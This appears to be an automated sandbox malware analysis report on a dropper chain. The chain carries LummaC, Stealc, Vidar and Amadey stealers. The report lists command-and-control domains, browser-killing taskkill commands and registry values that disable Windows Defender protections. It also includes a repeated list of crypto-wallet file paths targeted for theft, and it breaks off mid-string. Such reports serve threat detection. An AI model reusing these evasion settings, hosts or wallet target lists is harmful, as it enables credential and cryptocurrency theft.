Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_6C6EAC62

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED

LummaC encrypted strings found

Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: presticitpo.store

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"	Jump to behavior

Uses taskkill to terminate processes

Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

6_2_6C734760

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

6_2_6C611C30

Source: 5e28f62265.exe, 0000000E.00000000.2797533174.00000000009B2000.00000002.00000001.01000000.00000012.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Program Manager
Source: e192e43b61.exe, 0000000A.00000002.3022668199.0000000000BC3000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: &Program Manager
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: `Program Manager
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2448369339.0000000000381000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: fProgram Manager
Source: firefox.exe, 0000001D.00000002.2944162932.0000009976DFB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EAE71 cpuid

6_2_6C6EAE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001608001\num.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001608001\num.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_6C6EA8DC

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C638390 NSS_GetVersion,

6_2_6C638390

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1	Jump to behavior

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe

Registry value created: TamperProtection 0

Jump to behavior

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations	Jump to behavior

AV process strings found (often used to terminate AV products)

Source: file.exe, 00000000.00000003.1804551591.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1803782267.0000000001762000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2679740158.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2679872319.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883449383.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2830596978.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2842380759.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2823881110.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2844205318.0000000005A99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.1872745681.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1810944593.0000000005E14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dows Defender\MsMpeng.exe
Source: file.exe, file.exe, 00000000.00000003.1872781247.0000000001762000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001762000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 33.2.C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.skotes.exe.490000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.6IF65DE3AL7UEH5E4W09DIZ.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2308287602.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2100193708.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2906938578.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2140947944.0000000000491000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2950501488.0000000000E31000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2031756029.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2119358992.0000000000F41000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 32.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.3015827110.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2750222076.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2901676931.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3019501243.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2852632926.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2709864138.0000000005560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.2857203948.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2142029213.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Wallets/Electrum
Source: file.exe	String found in binary or memory: Wallets/ElectronCash
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe	String found in binary or memory: window-state.json
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.conf.json
Source: file.exe, 00000000.00000003.1786821317.0000000001774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local 